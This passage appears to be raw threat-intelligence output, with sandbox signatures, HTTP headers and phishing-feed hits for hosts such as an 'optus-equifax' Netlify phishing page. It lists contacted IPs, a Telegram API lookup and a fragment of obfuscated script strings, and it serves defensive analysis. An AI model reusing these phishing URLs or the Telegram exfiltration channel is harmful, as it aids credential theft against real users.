[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4a885ded-eb9a-4f27-8dc1-8665d4f15f6c.tmp]- [targetUID: 00000000-00005488]\n "0179aead-0dda-4e52-8e23-8fe040344942.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\0179aead-0dda-4e52-8e23-8fe040344942.tmp]- [targetUID: 00000000-00005016]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.fingerprint]- [targetUID: 00000000-00005488]\n "1355abef-4c0f-45ce-aac0-8be051cd890d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\1355abef-4c0f-45ce-aac0-8be051cd890d.tmp]- [targetUID: 00000000-00005488]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\5488_1156268761\\shoppingfre.js]- [targetUID: 00000000-00005488]\n "shopping.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.html]- [targetUID: 00000000-00005488]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://optus-equifax.netlify.app/"\n Pattern match: "https://optus-equifax.netlify.app"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\5488_1156268761\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00005488]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\5488_1156268761\\shoppingfre.js]- [targetUID: 00000000-00005488]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\5488_430541408\\adblock_snippet.js]- [targetUID: 00000000-00005488]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\5488_1156268761\\edge_checkout_page_validator.js]- [targetUID: 00000000-00005488]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\5488_1156268761\\shopping_iframe_driver.js]- [targetUID: 00000000-00005488]\n Dropped file: "product_page.js" - Location: [%TEMP%\\5488_1156268761\\product_page.js]- [targetUID: 00000000-00005488]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\5488_1156268761\\auto_open_controller.js]- [targetUID: 00000000-00005488]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\5488_1156268761\\edge_tracking_page_validator.js]- [targetUID: 00000000-00005488]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\5488_430541408\\Part-RU]- [targetUID: 00000000-00005488]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1005', u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005488-00000BE4-175787744\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\reports" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005488-00000BE4-178660786\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\attachments" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005488-00000BE4-182258197\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data" (Indica | 34.148.97.127 |
| 2023-05-12 02:47:15 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 16, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'VM-890240065.html', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\IMM32.DLL" at base 1c030000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base 1a0f0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base 1a0f0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base 1a0f0000\n "msedge.exe" loaded module "KERNEL32" at base 1c130000\n "msedge.exe" loaded module "C:\\WINDOWS\\TEMP\\VXOLE64.DLL" at base 130d0000\n "msedge.exe" loaded module "KERNEL32.DLL" at base 1c130000\n "msedge.exe" loaded module "COMBASE.DLL" at base cc30000\n "msedge.exe" loaded module "OLE32.DLL" at base 1b8a0000\n "msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\UXTHEME.DLL" at base 183e0000\n "msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\WINDOWS.SYSTEM.PROFILE.PLATFORMDIAGNOSTICSANDUSAGEDATASETTINGS.DLL" at base c60000\n "msedge.exe" loaded module "NTDLL.DLL" at base 1da50000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base 1afc0000\n "msedge.exe" loaded module "SHELL32.DLL" at base 1c3e0000\n "msedge.exe" loaded module "USER32.DLL" at base 1b070000'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:3108:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3108:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "Local\\SM0:3108:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:3108:304:WilStaging_02"\n "Local\\SM0:3108:120:WilError_01"\n "SM0:3108:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3108:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3108:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "104.22.58.100:443"\n "65.8.158.45:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"@ntdll.dll"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\000003.log]- [targetUID: 00000000-00003108]\n "dff028b9-debb-425e-95ec-db6dcfe0c7a5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\dff028b9-debb-425e-95ec-db6dcfe0c7a5.tmp]- [targetUID: 00000000-00003108]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003108]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003108]\n "recovery-component-inner.crx" has type "Google Chrome extension version 3"- Location: [%TEMP%\\3108_988682905\\recovery-component-inner.crx]- [targetUID: 00000000-00003108]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\3108_1946692508\\_metadata\\verified_contents.json]- [targetUID: 00000000-00003108]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.42\\Ruleset Data]- [targetUID: 00000000-00003108]\n "safety_tips.pb" has type "data"- Location: [%TEMP%\\3108_1946692508\\safety_tips.pb]- [targetUID: 00000000-00003108]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\3108_1321371211\\LICENSE]- [targetUID: 00000000-00003108]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\manifest.fingerprint]- [targetUID: 00000000-00003108]\n "Tabs_13322050400392718" has type "data"- [targetUID: 00000000-00003108]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\3108_1321371211\\Filtering Rules-AA]- [targetUID: 00000000-00003108]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00003108]\n "crl-set" has type "data"- Location: [%TEMP%\\3108_2078777495\\crl-set]- [targetUID: 00000000-00003108]\n "542bbdf5-e20d-490f-b532-dad17c51b430.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\542bbdf5-e20d-490f-b532-dad17c51b430.tmp]- [targetUID: 00000000-00003108]\n "edfd1835-3b13-413e-ace3-5b2b20c35b91.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\edfd1835-3b13-413e-ace3-5b2b20c35b91.tmp]- [targetUID: 00000000-00003108]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00003108]\n "53d044ee-9693-456b-888f-a32a00e16b55.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\53d044ee-9693-456b-888f-a32a00e16b55.tmp]- [targetUID: 00000000-00003108]\n "79c56db7-bc22-4724-af43-440425afe543.tmp" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\79c56db7-bc22-4724-af43-440425afe543.tmp]- [targetUID: 00000000-00003108]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.42"\n Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.42\\LICENSE"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'"HTTPS traffic to 185.199.111.153 on port 443"\n "HTTPS traffic to 104.22.58.100 on port 443"\n "HTTPS traffic to 65.8.158.45 on port 443"\n "HTTPS traffic to 149.154.167.220 on port 443"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "\',\'HTwmL\',\'FMZIW\',\'YxdVX\',\'UUudk\',\'osUws\',\'\\x22\\x20alt\',\'Vk_o8\',\'bmlnN\',\'JcovJ\',\'MJRMC\',\'bnPFS\',\'t\\x20:\\x20\',\'ZiAVF\',\'gUJej\',\'ABXSa\',\'Count\',\'sendM\',\'UeqSP\',\'LYCIA\',\'ine_a\',\'cETfn\',\'\\x20View\',\'bMiuV\',\'bot59\',\'ZhDfd\',\'nGSWQ\',\'UZgVS\',\'yzTJX\',\'btzqT\',\'#Date\',"\n Heuristic match: "api.telegram.org"\n Heuristic match: "fondon@fondon.org"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Gener | 185.199.111.153 |
| 2023-05-12 02:54:23 | Physical Location | No | Censys | 0 | 0 | 4 | 0 | None | Seattle, Washington, 98108, United States, North America | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000panther.github.io]
https://www.openphish.com/feed.txt | 000panther.github.io |
| 2023-05-12 02:49:46 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 30, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://www.executiveadvertising.com/customized-spot-pro-bluetooth-finder-and-key-chain-373749', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.executiveadvertising.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com"\n "www.executiveadvertising.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.67.70.96:80"\n "104.26.10.127:443"\n "104.17.24.14:443"\n "142.250.188.10:443"\n "142.250.189.163:443"\n "172.217.164.110:443"\n "104.16.88.20:443"\n "162.159.138.60:443"\n "185.199.110.153:443"\n "142.250.189.170:443"\n "142.250.189.232:443"\n "142.251.32.46:443"\n "142.250.189.194:443"\n "157.240.22.25:443"\n "172.67.31.34:443"\n "108.138.246.82:443"\n "142.251.2.154:443"\n "142.250.189.206:443"\n "3.5.130.105:443"\n "157.240.22.35:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2024:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:6540:120:WilError_01"\n "Local\\SM0:6540:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:2024:304:WilStaging_02"\n "Local\\SM0:2024:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2024:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3208:304:WilStaging_02"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata\\000003.log]- [targetUID: 00000000-00002024]\n "f_00024d" has type "gzip compressed data from Unix original size modulo 2^32 471850"- [targetUID: N/A]\n "f_000268" has type "PNG image data 429 x 217 8-bit gray+alpha non-interlaced"- [targetUID: N/A]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\index]- [targetUID: 00000000-00004876]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00002024]\n "f_00023e" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62) quality = 100" baseline precision 8 500x500 components 3"- [targetUID: N/A]\n "f_000288" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 135640"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000288]- [targetUID: 00000000-00004876]\n "9ac0e6829ca7a18f_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\9ac0e6829ca7a18f_0]- [targetUID: 00000000-00002024]\n "f_000284" has type "gzip compressed data from Unix original size modulo 2^32 92360"- [targetUID: N/A]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping2024_1522616664\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00002024]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Travel\\1.0.0.2\\manifest.fingerprint]- [targetUID: 00000000-00002024]\n "Part-DE" has type "data"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping2024_270139010\\Part-DE]- [targetUID: 00000000-00002024]\n "f_000243" has type "PNG image data 186 x 307 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "25bad0fd-411d-4c1e-849e-122df527ffb6.tmp" has type "JSON data"- [targetUID: N/A]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Wallet\\110.14679.14647.49\\shopping_iframe_driver.js]- [targetUID: 00000000-00002024]\n "f_00023d" has type "gzip compressed data from Unix original size modulo 2^32 97168"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00004876]\n "README.md" has type "ASCII text"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping2024_1522616664\\json\\wallet\\README.md]- [targetUID: 00000000-00002024]\n "super_coupon.json" has type "JSON data"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping2024_1522616664\\json\\wallet\\super_coupon.json]- [targetUID: 00000000-00002024]\n "strings.json" has type "JSON data"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping2024_1522616664\\json\\i18n-hub\\fr-CA\\strings.json]- [targetUID: 00000000-00002024]\n "8805d9412d05b6b9_0" has type "data"- [targetUID: N/A]'}, {u'category': u'Anti-Detection/Stealthyness', u'origin': u'API Call', u'identifier': u'api-162', u'name': u'Rename files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1036', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-177', u'attck_id': u'T1036', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" renamed original file"%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\BrowserMetrics-spare.pma" to "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\BrowserMetrics\\BrowserMetrics-63F53077-7E8.pma"\n "msedge.exe" renamed original file"%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Extension Scripts\\LOG" to "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Extension Scripts\\LOG.old"\n "msedge.exe" renamed original file"%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\BrowserMetrics-spare.pma.tmp" to "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\BrowserMetrics-spare.pma"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.executiveadvertising.com/customized-spot-pro-bluetooth-finder-and-key-chain-373749"\n Pattern match: "http://www.executiveadvertising.com"\n Pattern match: "www.executiveadvertising.com"\n Heuristic match: "cdnjs.cloudflare.com"\n Heuristic match: "http5_/t_.__utiv_dve_sing.com/fiee_-_4-hour-N5h"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "110.0.0.0" found in string "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Sigma"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23"\n Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.42"\n Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.42\\LICENSE"'}], u'threat_level': 2, u'size': None, u'job_id': u'63f52f49a4f069c06e09dff9', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1036', u'suspicious_identifiers': [], u'attck_id': u'T1036', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ma | 185.199.110.153 |
| 2023-05-12 02:53:45 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["D718:0A5D:5B243B:873E4F:645D98BE"], "Age": ["0"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-chi-klot8100097-CHI"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683855551.810015,VS0,VE33"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["c4364b8ebfd36798d0a52940340cb79811a0b765"], "Content_Type": ["text/html; charset=utf-8"], "Via": ["1.1 varnish"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8002::153 |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.34): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:47:44 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://dockeer.space/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /css/e6fea20c42addb734e27fc610f911e9bbcdf079f/styles/dist/styles.css HTTP/1.1\nAccept: text/css, */*\nReferer: http://dockeer.space/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: d33wubrfki0l68.cloudfront.net\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET 